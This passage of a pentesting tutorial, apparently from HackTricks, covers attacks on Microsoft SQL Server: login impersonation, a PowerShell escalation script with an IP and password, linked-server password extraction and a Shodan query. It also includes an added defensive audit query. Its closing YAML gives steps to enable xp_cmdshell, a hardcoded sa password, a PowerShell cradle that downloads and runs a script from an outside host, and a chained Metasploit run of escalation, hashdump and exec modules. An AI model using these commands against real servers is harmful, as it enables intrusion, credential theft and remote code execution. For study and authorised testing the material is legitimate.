{% hint style="info" %} If you can impersonate a user, even if he isn't sysadmin, you should check **if the user has access** to other **databases** or linked servers. {% endhint %}
Note that once you are sysadmin you can impersonate any other one:
```sql
-- Impersonate RegUser
EXECUTE AS LOGIN = 'RegUser'
-- Verify you are now running as the RegUser login
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
-- Change back to sa
REVERT
```
You can perform this attack with a **metasploit** module:
```bash
msf> auxiliary/admin/mssql/mssql_escalate_execute_as
```
or with a **PS** script:
```powershell
# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-ExecuteAs.psm1
Import-Module .\Invoke-SqlServer-Escalate-ExecuteAs.psm1
Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuser1 -SqlPass MyPassword!
```
## Using MSSQL for Persistence
https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
## Extracting passwords from SQL Server Linked Servers
An attacker can extract SQL Server Linked Servers passwords from the SQL instances and get them in clear text, granting the attacker passwords that can be used to acquire a greater foothold on the target. The script to extract and decrypt the passwords stored for the Linked Servers can be found here.
Some requirements and configurations must be in place in order for this exploit to work. First of all, you must have Administrator rights on the machine, or the ability to manage the SQL Server configurations.
After validating your permissions, you need to configure three things, which are the following:
- Enable TCP/IP on the SQL Server instances;
- Add a Start Up parameter, in this case a trace flag will be added, which is -T7806;
- Enable remote admin connections.
To automate these configurations, this repository has the needed scripts. Besides having a PowerShell script for each step of the configuration, the repository also has a full script which combines the configuration scripts with the extraction and decryption of the passwords.
For further information, refer to the following link regarding this attack: Decrypting MSSQL Database Link Server Passwords
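What the extraction above recovers is the remote password stored for each linked-server login mapping, so the defensive question is which linked servers carry one at all. The added example below (not HackTricks' or the referenced repository's code) lists every linked server with its login mappings and classifies each mapping as pass-through (the caller's own identity is forwarded, nothing stored) or stored-credential; it assumes `VIEW ANY DEFINITION` or sysadmin.

```sql
-- Added example: linked servers and their login mappings, flagging the ones that store a
-- remote password on this instance. Assumes VIEW ANY DEFINITION or sysadmin.
SELECT
    s.name                              AS linked_server,
    s.product,
    s.provider,
    s.data_source,
    COALESCE(lp.name, N'<any login>')   AS local_login,      -- default mapping applies to every login
    ll.uses_self_credential,                                 -- 1 = caller's own identity is forwarded
    ll.remote_name,                                          -- remote login whose password is stored
    CASE WHEN ll.uses_self_credential = 0 AND ll.remote_name IS NOT NULL
         THEN 'stored password'
         ELSE 'no stored secret' END    AS credential_mode,
    s.is_rpc_out_enabled,                                    -- RPC OUT: callers can run procedures remotely
    s.is_data_access_enabled
FROM sys.servers AS s
JOIN sys.linked_logins AS ll
    ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS lp
    ON ll.local_principal_id = lp.principal_id
WHERE s.is_linked = 1
ORDER BY credential_mode, s.name;
```

A `stored password` row whose `local_login` is `<any login>` is the worst case: every login on this instance reaches the remote server as `remote_name`, and the secret sits on disk for the procedure above to recover. Narrowing the mapping to specific logins, or switching to pass-through where Kerberos allows it, removes the stored secret rather than merely hiding it.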
## Local Privilege Escalation
The user running MSSQL server will have enabled the privilege token **SeImpersonatePrivilege**.
You probably will be able to **escalate to Administrator** following one of these two pages:
{% content-ref url="../../windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md" %} roguepotato-and-printspoofer.md {% endcontent-ref %}
{% content-ref url="../../windows-hardening/windows-local-privilege-escalation/juicypotato.md" %} juicypotato.md {% endcontent-ref %}
## Shodan
```
port:1433 !HTTP
```
## References
- https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users
- https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/
- https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/
- https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/
- https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-2-user-impersonation/
- https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/
- https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/
## HackTricks Automatic Commands
```yaml
Protocol_Name: MSSQL #Protocol Abbreviation if there is one.
Port_Number: 1433 #Comma separated if there is more than one.
Protocol_Description: Microsoft SQL Server #Protocol Abbreviation Spelled out
Entry_1:
  Name: Notes
  Description: Notes for MSSQL
  Note: |
    Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications, which may run either on the same computer or on another computer across a network (including the Internet).
    #sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G
    ###the goal is to get xp_cmdshell working###
    1. try and see if it works
    xp_cmdshell `whoami`
    go
    2. try to turn component back on
    EXEC SP_CONFIGURE 'xp_cmdshell' , 1
    reconfigure
    go
    xp_cmdshell `whoami`
    go
    3. 'advanced' turn it back on
    EXEC SP_CONFIGURE 'show advanced options', 1
    reconfigure
    go
    EXEC SP_CONFIGURE 'xp_cmdshell' , 1
    reconfigure
    go
    xp_cmdshell 'whoami'
    go
    xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://10.10.14.60:8000/ye443.ps1')"
    https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server
Entry_2:
  Name: Nmap for SQL
  Description: Nmap with SQL Scripts
  Command: nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 {IP}
Entry_3:
  Name: MSSQL consoleless msf enumeration
  Description: MSSQL enumeration without the need to run msfconsole
  Note: sourced from https://github.com/carlospolop/legion
  Command: msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_ping; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_enum; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use admin/mssql/mssql_enum_domain_accounts; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use admin/mssql/mssql_enum_sql_logins; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_dbowner; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_execute_as; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_exec; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_findandsampledata; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_hashdump; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_schemadump; set RHOSTS {IP}; set RPORT <PORT>; run; exit'
```